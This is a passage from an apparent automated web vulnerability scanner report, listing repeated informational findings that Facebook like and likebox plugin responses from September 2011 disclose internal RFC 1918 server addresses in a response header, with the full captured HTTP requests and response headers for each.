User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.35.43
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 25783

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.54. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.37.36
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:30 GMT
Content-Length: 23259

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.55. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2d89b260c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:30 GMT
Content-Length: 26053

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.56. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FYahooMovies&layout=standard&show_faces=true&width=250&action=like&font=arial&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.50
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:01 GMT
Content-Length: 24431

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.57. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/xfinity/wireless-mobile-broadband.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.40.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:24:55 GMT
Content-Length: 23350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.58. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1bf0ee42c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.facebook.com%2Fyahoosports&layout=standard&node_type=link&sdk=joey&show_faces=true&width=275 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Length: 26918

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.59. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.42.57
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:43 GMT
Content-Length: 23272

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.60. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/xfinity/wireless-mobile-broadband.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.31.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:24:54 GMT
Content-Length: 23350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.61. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3f9b4fbb4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.facebook.com%2Fyahoosports&layout=standard&node_type=link&sdk=joey&show_faces=true&width=275 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.144.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:38 GMT
Content-Length: 26917

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.62. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://finance.yahoo.com%2Fq%3Fs%3DXSS.F&layout=button_count&show_faces=false&action=like&font=arial&colorscheme=light&height=21&width=100&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.144.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:16 GMT
Content-Length: 23445

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.63. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/DigitalCable/digitalcable.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.5.46
X-Cnection: close
Date: Tue, 06 Sep 2011 12:25:30 GMT
Content-Length: 23342

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.64. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/login-error/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.35.47
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:37 GMT
Content-Length: 23272

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.65. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.26.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:26 GMT
Content-Length: 23269

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.66. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d72c50%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.65
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:07 GMT
Content-Length: 26012

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.67. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3647379a8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:08 GMT
Content-Length: 26014

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.68. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fyahoorealestate&width=220&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Content-Length: 8262

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.69. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

19.70. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
